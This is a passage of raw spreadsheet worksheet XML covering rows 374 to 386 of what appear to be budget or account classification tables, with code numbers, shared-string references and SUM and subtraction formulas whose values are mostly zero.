      <c r="AF374" s="17">
        <f t="shared" si="163"/>
        <v>0</v>
      </c>
      <c r="AG374" s="17">
        <f t="shared" si="163"/>
        <v>0</v>
      </c>
      <c r="AH374" s="17">
        <f t="shared" si="163"/>
        <v>0</v>
      </c>
      <c r="AI374" s="17">
        <f t="shared" si="163"/>
        <v>0</v>
      </c>
      <c r="AJ374" s="17">
        <f t="shared" si="163"/>
        <v>0</v>
      </c>
      <c r="AK374" s="17">
        <f t="shared" si="163"/>
        <v>0</v>
      </c>
      <c r="AL374" s="17">
        <f t="shared" si="163"/>
        <v>0</v>
      </c>
      <c r="AM374" s="17">
        <f t="shared" si="163"/>
        <v>0</v>
      </c>
      <c r="AN374" s="17">
        <f t="shared" si="163"/>
        <v>0</v>
      </c>
      <c r="AO374" s="17">
        <f t="shared" si="163"/>
        <v>0</v>
      </c>
      <c r="AP374" s="17">
        <f t="shared" si="163"/>
        <v>0</v>
      </c>
    </row>
    <row r="375" ht="18" customHeight="1" spans="1:42">
      <c r="A375" s="10">
        <v>103101399</v>
      </c>
      <c r="B375" s="16" t="s">
        <v>3114</v>
      </c>
      <c r="C375" s="17">
        <v>0</v>
      </c>
      <c r="D375" s="13">
        <v>20410</v>
      </c>
      <c r="E375" s="11" t="s">
        <v>3115</v>
      </c>
      <c r="F375" s="14">
        <f t="shared" si="151"/>
        <v>0</v>
      </c>
      <c r="G375" s="12">
        <f t="shared" ref="G375:R375" si="164">SUM(G376:G380)</f>
        <v>0</v>
      </c>
      <c r="H375" s="12">
        <f t="shared" si="164"/>
        <v>0</v>
      </c>
      <c r="I375" s="12">
        <f t="shared" si="164"/>
        <v>0</v>
      </c>
      <c r="J375" s="12">
        <f t="shared" si="164"/>
        <v>0</v>
      </c>
      <c r="K375" s="12">
        <f t="shared" si="164"/>
        <v>0</v>
      </c>
      <c r="L375" s="12">
        <f t="shared" si="164"/>
        <v>0</v>
      </c>
      <c r="M375" s="12">
        <f t="shared" si="164"/>
        <v>0</v>
      </c>
      <c r="N375" s="12">
        <f t="shared" si="164"/>
        <v>0</v>
      </c>
      <c r="O375" s="12">
        <f t="shared" si="164"/>
        <v>0</v>
      </c>
      <c r="P375" s="12">
        <f t="shared" si="164"/>
        <v>0</v>
      </c>
      <c r="Q375" s="12">
        <f t="shared" si="164"/>
        <v>0</v>
      </c>
      <c r="R375" s="12">
        <f t="shared" si="164"/>
        <v>0</v>
      </c>
      <c r="S375" s="12">
        <v>0</v>
      </c>
      <c r="T375" s="12">
        <v>0</v>
      </c>
      <c r="U375" s="12">
        <v>0</v>
      </c>
      <c r="V375" s="12">
        <v>0</v>
      </c>
      <c r="W375" s="12">
        <v>0</v>
      </c>
      <c r="X375" s="12">
        <v>0</v>
      </c>
      <c r="Y375" s="12">
        <v>0</v>
      </c>
      <c r="Z375" s="12">
        <v>0</v>
      </c>
      <c r="AA375" s="12">
        <v>0</v>
      </c>
      <c r="AB375" s="12">
        <v>0</v>
      </c>
      <c r="AC375" s="12">
        <v>0</v>
      </c>
      <c r="AD375" s="12">
        <v>0</v>
      </c>
      <c r="AE375" s="12">
        <f t="shared" ref="AE375:AP375" si="165">SUM(AE376:AE380)</f>
        <v>0</v>
      </c>
      <c r="AF375" s="12">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="AG375" s="12">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="AH375" s="12">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="AI375" s="12">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="AJ375" s="12">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="AK375" s="12">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="AL375" s="12">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="AM375" s="12">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="AN375" s="12">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="AO375" s="12">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
      <c r="AP375" s="12">
        <f t="shared" si="165"/>
        <v>0</v>
      </c>
    </row>
    <row r="376" ht="18" customHeight="1" spans="1:42">
      <c r="A376" s="10">
        <v>1031014</v>
      </c>
      <c r="B376" s="16" t="s">
        <v>3116</v>
      </c>
      <c r="C376" s="17">
        <v>0</v>
      </c>
      <c r="D376" s="13">
        <v>2041001</v>
      </c>
      <c r="E376" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F376" s="14">
        <f t="shared" si="151"/>
        <v>0</v>
      </c>
      <c r="G376" s="17"/>
      <c r="H376" s="17"/>
      <c r="I376" s="17"/>
      <c r="J376" s="17"/>
      <c r="K376" s="17"/>
      <c r="L376" s="17"/>
      <c r="M376" s="17"/>
      <c r="N376" s="17"/>
      <c r="O376" s="17"/>
      <c r="P376" s="17"/>
      <c r="Q376" s="17"/>
      <c r="R376" s="17"/>
      <c r="S376" s="17"/>
      <c r="T376" s="17"/>
      <c r="U376" s="17"/>
      <c r="V376" s="17"/>
      <c r="W376" s="17"/>
      <c r="X376" s="17"/>
      <c r="Y376" s="17"/>
      <c r="Z376" s="17"/>
      <c r="AA376" s="17"/>
      <c r="AB376" s="17"/>
      <c r="AC376" s="17"/>
      <c r="AD376" s="17"/>
      <c r="AE376" s="17">
        <f t="shared" ref="AE376:AP380" si="166">G376-S376</f>
        <v>0</v>
      </c>
      <c r="AF376" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AG376" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AH376" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AI376" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AJ376" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AK376" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AL376" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AM376" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AN376" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AO376" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AP376" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
    </row>
    <row r="377" ht="18" customHeight="1" spans="1:42">
      <c r="A377" s="10">
        <v>1031099</v>
      </c>
      <c r="B377" s="16" t="s">
        <v>3117</v>
      </c>
      <c r="C377" s="12">
        <f>C378+C379</f>
        <v>0</v>
      </c>
      <c r="D377" s="13">
        <v>2041002</v>
      </c>
      <c r="E377" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F377" s="14">
        <f t="shared" si="151"/>
        <v>0</v>
      </c>
      <c r="G377" s="17"/>
      <c r="H377" s="17"/>
      <c r="I377" s="17"/>
      <c r="J377" s="17"/>
      <c r="K377" s="17"/>
      <c r="L377" s="17"/>
      <c r="M377" s="17"/>
      <c r="N377" s="17"/>
      <c r="O377" s="17"/>
      <c r="P377" s="17"/>
      <c r="Q377" s="17"/>
      <c r="R377" s="17"/>
      <c r="S377" s="17"/>
      <c r="T377" s="17"/>
      <c r="U377" s="17"/>
      <c r="V377" s="17"/>
      <c r="W377" s="17"/>
      <c r="X377" s="17"/>
      <c r="Y377" s="17"/>
      <c r="Z377" s="17"/>
      <c r="AA377" s="17"/>
      <c r="AB377" s="17"/>
      <c r="AC377" s="17"/>
      <c r="AD377" s="17"/>
      <c r="AE377" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AF377" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AG377" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AH377" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AI377" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AJ377" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AK377" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AL377" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AM377" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AN377" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AO377" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AP377" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
    </row>
    <row r="378" ht="18" customHeight="1" spans="1:42">
      <c r="A378" s="10">
        <v>103109998</v>
      </c>
      <c r="B378" s="16" t="s">
        <v>3118</v>
      </c>
      <c r="C378" s="17">
        <v>0</v>
      </c>
      <c r="D378" s="13">
        <v>2041006</v>
      </c>
      <c r="E378" s="16" t="s">
        <v>2622</v>
      </c>
      <c r="F378" s="14">
        <f t="shared" si="151"/>
        <v>0</v>
      </c>
      <c r="G378" s="17"/>
      <c r="H378" s="17"/>
      <c r="I378" s="17"/>
      <c r="J378" s="17"/>
      <c r="K378" s="17"/>
      <c r="L378" s="17"/>
      <c r="M378" s="17"/>
      <c r="N378" s="17"/>
      <c r="O378" s="17"/>
      <c r="P378" s="17"/>
      <c r="Q378" s="17"/>
      <c r="R378" s="17"/>
      <c r="S378" s="17"/>
      <c r="T378" s="17"/>
      <c r="U378" s="17"/>
      <c r="V378" s="17"/>
      <c r="W378" s="17"/>
      <c r="X378" s="17"/>
      <c r="Y378" s="17"/>
      <c r="Z378" s="17"/>
      <c r="AA378" s="17"/>
      <c r="AB378" s="17"/>
      <c r="AC378" s="17"/>
      <c r="AD378" s="17"/>
      <c r="AE378" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AF378" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AG378" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AH378" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AI378" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AJ378" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AK378" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AL378" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AM378" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AN378" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AO378" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AP378" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
    </row>
    <row r="379" ht="18" customHeight="1" spans="1:42">
      <c r="A379" s="10">
        <v>103109999</v>
      </c>
      <c r="B379" s="16" t="s">
        <v>3119</v>
      </c>
      <c r="C379" s="17">
        <v>0</v>
      </c>
      <c r="D379" s="13">
        <v>2041007</v>
      </c>
      <c r="E379" s="16" t="s">
        <v>3120</v>
      </c>
      <c r="F379" s="14">
        <f t="shared" si="151"/>
        <v>0</v>
      </c>
      <c r="G379" s="17"/>
      <c r="H379" s="17"/>
      <c r="I379" s="17"/>
      <c r="J379" s="17"/>
      <c r="K379" s="17"/>
      <c r="L379" s="17"/>
      <c r="M379" s="17"/>
      <c r="N379" s="17"/>
      <c r="O379" s="17"/>
      <c r="P379" s="17"/>
      <c r="Q379" s="17"/>
      <c r="R379" s="17"/>
      <c r="S379" s="17"/>
      <c r="T379" s="17"/>
      <c r="U379" s="17"/>
      <c r="V379" s="17"/>
      <c r="W379" s="17"/>
      <c r="X379" s="17"/>
      <c r="Y379" s="17"/>
      <c r="Z379" s="17"/>
      <c r="AA379" s="17"/>
      <c r="AB379" s="17"/>
      <c r="AC379" s="17"/>
      <c r="AD379" s="17"/>
      <c r="AE379" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AF379" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AG379" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AH379" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AI379" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AJ379" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AK379" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AL379" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AM379" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AN379" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AO379" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AP379" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
    </row>
    <row r="380" ht="18" customHeight="1" spans="1:42">
      <c r="A380" s="10"/>
      <c r="B380" s="16"/>
      <c r="C380" s="21"/>
      <c r="D380" s="13">
        <v>2041099</v>
      </c>
      <c r="E380" s="16" t="s">
        <v>3121</v>
      </c>
      <c r="F380" s="14">
        <f t="shared" si="151"/>
        <v>0</v>
      </c>
      <c r="G380" s="17"/>
      <c r="H380" s="17"/>
      <c r="I380" s="17"/>
      <c r="J380" s="17"/>
      <c r="K380" s="17"/>
      <c r="L380" s="17"/>
      <c r="M380" s="17"/>
      <c r="N380" s="17"/>
      <c r="O380" s="17"/>
      <c r="P380" s="17"/>
      <c r="Q380" s="17"/>
      <c r="R380" s="17"/>
      <c r="S380" s="17"/>
      <c r="T380" s="17"/>
      <c r="U380" s="17"/>
      <c r="V380" s="17"/>
      <c r="W380" s="17"/>
      <c r="X380" s="17"/>
      <c r="Y380" s="17"/>
      <c r="Z380" s="17"/>
      <c r="AA380" s="17"/>
      <c r="AB380" s="17"/>
      <c r="AC380" s="17"/>
      <c r="AD380" s="17"/>
      <c r="AE380" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AF380" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AG380" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AH380" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AI380" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AJ380" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AK380" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AL380" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AM380" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AN380" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AO380" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
      <c r="AP380" s="17">
        <f t="shared" si="166"/>
        <v>0</v>
      </c>
    </row>
    <row r="381" ht="18" customHeight="1" spans="1:42">
      <c r="A381" s="10">
        <v>10306</v>
      </c>
      <c r="B381" s="11" t="s">
        <v>3122</v>
      </c>
      <c r="C381" s="12">
        <f>SUM(C382,C414,C419,C425,C429)</f>
        <v>0</v>
      </c>
      <c r="D381" s="13">
        <v>20499</v>
      </c>
      <c r="E381" s="11" t="s">
        <v>3123</v>
      </c>
      <c r="F381" s="14">
        <f t="shared" si="151"/>
        <v>61</v>
      </c>
      <c r="G381" s="12">
        <f t="shared" ref="G381:R381" si="167">G382+G383</f>
        <v>338</v>
      </c>
      <c r="H381" s="12">
        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="I381" s="12">
        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="J381" s="12">
        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="K381" s="12">
        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="L381" s="12">
        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="M381" s="12">
        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="N381" s="12">
        <f t="shared" si="167"/>
        <v>12</v>
      </c>
      <c r="O381" s="12">
        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="P381" s="12">
        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="Q381" s="12">
        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="R381" s="12">
        <f t="shared" si="167"/>
        <v>49</v>
      </c>
      <c r="S381" s="12">
        <v>315</v>
      </c>
      <c r="T381" s="12">
        <v>0</v>
      </c>
      <c r="U381" s="12">
        <v>0</v>
      </c>
      <c r="V381" s="12">
        <v>0</v>
      </c>
      <c r="W381" s="12">
        <v>0</v>
      </c>
      <c r="X381" s="12">
        <v>0</v>
      </c>
      <c r="Y381" s="12">
        <v>0</v>
      </c>
      <c r="Z381" s="12">
        <v>8</v>
      </c>
      <c r="AA381" s="12">
        <v>0</v>
      </c>
      <c r="AB381" s="12">
        <v>0</v>
      </c>
      <c r="AC381" s="12">
        <v>0</v>
      </c>
      <c r="AD381" s="12">
        <v>45</v>
      </c>
      <c r="AE381" s="12">
        <f t="shared" ref="AE381:AP381" si="168">AE382+AE383</f>
        <v>23</v>
      </c>
      <c r="AF381" s="12">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="AG381" s="12">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="AH381" s="12">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="AI381" s="12">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="AJ381" s="12">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="AK381" s="12">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="AL381" s="12">
        <f t="shared" si="168"/>
        <v>4</v>
      </c>
      <c r="AM381" s="12">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="AN381" s="12">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="AO381" s="12">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="AP381" s="12">
        <f t="shared" si="168"/>
        <v>4</v>
      </c>
    </row>
    <row r="382" ht="18" customHeight="1" spans="1:42">
      <c r="A382" s="10">
        <v>1030601</v>
      </c>
      <c r="B382" s="16" t="s">
        <v>3124</v>
      </c>
      <c r="C382" s="12">
        <f>SUM(C383:C413)</f>
        <v>0</v>
      </c>
      <c r="D382" s="13">
        <v>2049902</v>
      </c>
      <c r="E382" s="16" t="s">
        <v>3125</v>
      </c>
      <c r="F382" s="14">
        <f t="shared" si="151"/>
        <v>0</v>
      </c>
      <c r="G382" s="17"/>
      <c r="H382" s="17"/>
      <c r="I382" s="17"/>
      <c r="J382" s="17"/>
      <c r="K382" s="17"/>
      <c r="L382" s="17"/>
      <c r="M382" s="17"/>
      <c r="N382" s="17"/>
      <c r="O382" s="17"/>
      <c r="P382" s="17"/>
      <c r="Q382" s="17"/>
      <c r="R382" s="17"/>
      <c r="S382" s="17"/>
      <c r="T382" s="17"/>
      <c r="U382" s="17"/>
      <c r="V382" s="17"/>
      <c r="W382" s="17"/>
      <c r="X382" s="17"/>
      <c r="Y382" s="17"/>
      <c r="Z382" s="17"/>
      <c r="AA382" s="17"/>
      <c r="AB382" s="17"/>
      <c r="AC382" s="17"/>
      <c r="AD382" s="17"/>
      <c r="AE382" s="17">
        <f t="shared" ref="AE382:AP383" si="169">G382-S382</f>
        <v>0</v>
      </c>
      <c r="AF382" s="17">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="AG382" s="17">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="AH382" s="17">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="AI382" s="17">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="AJ382" s="17">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="AK382" s="17">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="AL382" s="17">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="AM382" s="17">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="AN382" s="17">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="AO382" s="17">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="AP382" s="17">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
    </row>
    <row r="383" ht="18" customHeight="1" spans="1:42">
      <c r="A383" s="10">
        <v>103060103</v>
      </c>
      <c r="B383" s="16" t="s">
        <v>3126</v>
      </c>
      <c r="C383" s="17">
        <v>0</v>
      </c>
      <c r="D383" s="13">
        <v>2049999</v>
      </c>
      <c r="E383" s="16" t="s">
        <v>3127</v>
      </c>
      <c r="F383" s="14">
        <f t="shared" si="151"/>
        <v>61</v>
      </c>
      <c r="G383" s="17">
        <v>338</v>
      </c>
      <c r="H383" s="17"/>
      <c r="I383" s="17"/>
      <c r="J383" s="17"/>
      <c r="K383" s="17"/>
      <c r="L383" s="17"/>
      <c r="M383" s="17"/>
      <c r="N383" s="17">
        <v>12</v>
      </c>
      <c r="O383" s="17"/>
      <c r="P383" s="17"/>
      <c r="Q383" s="17"/>
      <c r="R383" s="17">
        <v>49</v>
      </c>
      <c r="S383" s="17">
        <v>315</v>
      </c>
      <c r="T383" s="17"/>
      <c r="U383" s="17"/>
      <c r="V383" s="17"/>
      <c r="W383" s="17"/>
      <c r="X383" s="17"/>
      <c r="Y383" s="17"/>
      <c r="Z383" s="17">
        <v>8</v>
      </c>
      <c r="AA383" s="17"/>
      <c r="AB383" s="17"/>
      <c r="AC383" s="17"/>
      <c r="AD383" s="17">
        <v>45</v>
      </c>
      <c r="AE383" s="17">
        <f t="shared" si="169"/>
        <v>23</v>
      </c>
      <c r="AF383" s="17">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="AG383" s="17">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="AH383" s="17">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="AI383" s="17">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="AJ383" s="17">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="AK383" s="17">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="AL383" s="17">
        <f t="shared" si="169"/>
        <v>4</v>
      </c>
      <c r="AM383" s="17">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="AN383" s="17">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="AO383" s="17">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="AP383" s="17">
        <f t="shared" si="169"/>
        <v>4</v>
      </c>
    </row>
    <row r="384" ht="18" customHeight="1" spans="1:42">
      <c r="A384" s="10">
        <v>103060104</v>
      </c>
      <c r="B384" s="16" t="s">
        <v>3128</v>
      </c>
      <c r="C384" s="17">
        <v>0</v>
      </c>
      <c r="D384" s="13">
        <v>205</v>
      </c>
      <c r="E384" s="11" t="s">
        <v>3129</v>
      </c>
      <c r="F384" s="14">
        <f t="shared" si="151"/>
        <v>59</v>
      </c>
      <c r="G384" s="12">
        <f t="shared" ref="G384:R384" si="170">G385+G390+G397+G403+G409+G413+G417+G421+G427+G434</f>
        <v>0</v>
      </c>
      <c r="H384" s="12">
        <f t="shared" si="170"/>
        <v>0</v>
      </c>
      <c r="I384" s="12">
        <f t="shared" si="170"/>
        <v>0</v>
      </c>
      <c r="J384" s="12">
        <f t="shared" si="170"/>
        <v>0</v>
      </c>
      <c r="K384" s="12">
        <f t="shared" si="170"/>
        <v>0</v>
      </c>
      <c r="L384" s="12">
        <f t="shared" si="170"/>
        <v>59</v>
      </c>
      <c r="M384" s="12">
        <f t="shared" si="170"/>
        <v>0</v>
      </c>
      <c r="N384" s="12">
        <f t="shared" si="170"/>
        <v>0</v>
      </c>
      <c r="O384" s="12">
        <f t="shared" si="170"/>
        <v>0</v>
      </c>
      <c r="P384" s="12">
        <f t="shared" si="170"/>
        <v>0</v>
      </c>
      <c r="Q384" s="12">
        <f t="shared" si="170"/>
        <v>0</v>
      </c>
      <c r="R384" s="12">
        <f t="shared" si="170"/>
        <v>0</v>
      </c>
      <c r="S384" s="12">
        <v>0</v>
      </c>
      <c r="T384" s="12">
        <v>0</v>
      </c>
      <c r="U384" s="12">
        <v>0</v>
      </c>
      <c r="V384" s="12">
        <v>0</v>
      </c>
      <c r="W384" s="12">
        <v>0</v>
      </c>
      <c r="X384" s="12">
        <v>59</v>
      </c>
      <c r="Y384" s="12">
        <v>0</v>
      </c>
      <c r="Z384" s="12">
        <v>0</v>
      </c>
      <c r="AA384" s="12">
        <v>0</v>
      </c>
      <c r="AB384" s="12">
        <v>0</v>
      </c>
      <c r="AC384" s="12">
        <v>0</v>
      </c>
      <c r="AD384" s="12">
        <v>0</v>
      </c>
      <c r="AE384" s="12">
        <f t="shared" ref="AE384:AP384" si="171">AE385+AE390+AE397+AE403+AE409+AE413+AE417+AE421+AE427+AE434</f>
        <v>0</v>
      </c>
      <c r="AF384" s="12">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="AG384" s="12">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="AH384" s="12">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="AI384" s="12">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="AJ384" s="12">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="AK384" s="12">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="AL384" s="12">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="AM384" s="12">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="AN384" s="12">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="AO384" s="12">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="AP384" s="12">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
    </row>
    <row r="385" ht="18" customHeight="1" spans="1:42">
      <c r="A385" s="10">
        <v>103060105</v>
      </c>
      <c r="B385" s="16" t="s">
        <v>3130</v>
      </c>
      <c r="C385" s="17">
        <v>0</v>
      </c>
      <c r="D385" s="13">
        <v>20501</v>
      </c>
      <c r="E385" s="11" t="s">
        <v>3131</v>
      </c>
      <c r="F385" s="14">
        <f t="shared" si="151"/>
        <v>0</v>
      </c>
      <c r="G385" s="12">
        <f t="shared" ref="G385:R385" si="172">SUM(G386:G389)</f>
        <v>0</v>
      </c>
      <c r="H385" s="12">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="I385" s="12">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="J385" s="12">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="K385" s="12">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="L385" s="12">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="M385" s="12">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="N385" s="12">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="O385" s="12">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="P385" s="12">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="Q385" s="12">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="R385" s="12">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="S385" s="12">
        <v>0</v>
      </c>
      <c r="T385" s="12">
        <v>0</v>
      </c>
      <c r="U385" s="12">
        <v>0</v>
      </c>
      <c r="V385" s="12">
        <v>0</v>
      </c>
      <c r="W385" s="12">
        <v>0</v>
      </c>
      <c r="X385" s="12">
        <v>0</v>
      </c>
      <c r="Y385" s="12">
        <v>0</v>
      </c>
      <c r="Z385" s="12">
        <v>0</v>
      </c>
      <c r="AA385" s="12">
        <v>0</v>
      </c>
      <c r="AB385" s="12">
        <v>0</v>
      </c>
      <c r="AC385" s="12">
        <v>0</v>
      </c>
      <c r="AD385" s="12">
        <v>0</v>
      </c>
      <c r="AE385" s="12">
        <f t="shared" ref="AE385:AP385" si="173">SUM(AE386:AE389)</f>
        <v>0</v>
      </c>
      <c r="AF385" s="12">
        <f t="shared" si="173"/>
        <v>0</v>
      </c>
      <c r="AG385" s="12">
        <f t="shared" si="173"/>
        <v>0</v>
      </c>
      <c r="AH385" s="12">
        <f t="shared" si="173"/>
        <v>0</v>
      </c>
      <c r="AI385" s="12">
        <f t="shared" si="173"/>
        <v>0</v>
      </c>
      <c r="AJ385" s="12">
        <f t="shared" si="173"/>
        <v>0</v>
      </c>
      <c r="AK385" s="12">
        <f t="shared" si="173"/>
        <v>0</v>
      </c>
      <c r="AL385" s="12">
        <f t="shared" si="173"/>
        <v>0</v>
      </c>
      <c r="AM385" s="12">
        <f t="shared" si="173"/>
        <v>0</v>
      </c>
      <c r="AN385" s="12">
        <f t="shared" si="173"/>
        <v>0</v>
      </c>
      <c r="AO385" s="12">
        <f t="shared" si="173"/>
        <v>0</v>
      </c>
      <c r="AP385" s="12">
        <f t="shared" si="173"/>
        <v>0</v>
      </c>
    </row>
    <row r="386" ht="18" customHeight="1" spans="1:42">
      <c r="A386" s="10">
        <v>103060106</v>
      </c>
      <c r="B386" s="16" t="s">
        <v>3132</v>
      </c>
      <c r="C386" s="17">
        <v>0</v>
      </c>
      <c r="D386" s="13">
        <v>2050101</v>
      </c>
